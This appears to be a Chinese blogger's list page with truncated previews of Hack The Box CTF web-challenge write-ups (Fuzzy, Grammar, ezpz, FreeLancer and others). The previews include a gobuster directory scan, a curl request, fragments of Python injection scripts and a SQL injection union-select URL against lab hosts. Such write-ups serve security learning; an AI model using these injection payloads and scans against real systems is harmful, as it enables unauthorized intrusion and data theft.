hackthebox
qq_39682037
这个作者很懒,什么都没留下…
展开
-
hack the box[HTB]web题之Fuzzy
gohb@gohb:~/桌面$ gobuster dir -u http://docker.hackthebox.eu:30568/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt gohb@gohb:~$ gobuster dir -u http://docker.hackthebox.eu:30568/ap...原创 2020-05-11 09:55:28 · 1918 阅读 · 0 评论 -
hack the box[HTB]web题之Grammar
When we access this page we get a Forbidden error. However we believe that something strange lies behind… Can you find a way in and retrieve the flag?真的像题目描述一样是forbidden页面请求数据不正常 看下页面响应是否正常好像没有异常...原创 2020-05-07 10:13:19 · 1935 阅读 · 0 评论 -
hack the box[HTB] 邀请码
搞了半天,就是叫你发送一个POST请求到 /api/invite/generategohb@gohb:~$ sudo curl -X POST https://www.hackthebox.eu/api/invite/generate原创 2020-05-02 14:08:49 · 2994 阅读 · 2 评论 -
hack the box[HTB]web题之ezpz
未定义变量,那么自然就是obj手工一个个转码成base64太麻烦了,上脚本吧没问题,只需要更改payload即可。import requestsimport base64from bs4 import BeautifulSoupdef injection(payload): params = { "obj": base64.b64encode(pa...原创 2020-04-27 09:29:23 · 2188 阅读 · 0 评论 -
hack the box[HTB]web题之Emdee five for life
Can you encrypt fast enough?import requestsimport hashlibimport reurl="http://docker.hackthebox.eu:30826/"r=requests.session()out=r.get(url)out=re.search("<h3 align='center'>+.*?<...原创 2020-04-27 09:14:21 · 2781 阅读 · 0 评论 -
hack the box[HTB]web题之FreeLancer
觉得是sql注入,让我来试一下http://docker.hackthebox.eu:30643?id=1尝试失败,再来看下页面这是啥,好像发现了新大陆http://docker.hackthebox.eu:30643/portfolio.php?id=-1 union select 1,group_concat(table_name),3 from information_s...原创 2020-04-27 09:06:50 · 2980 阅读 · 0 评论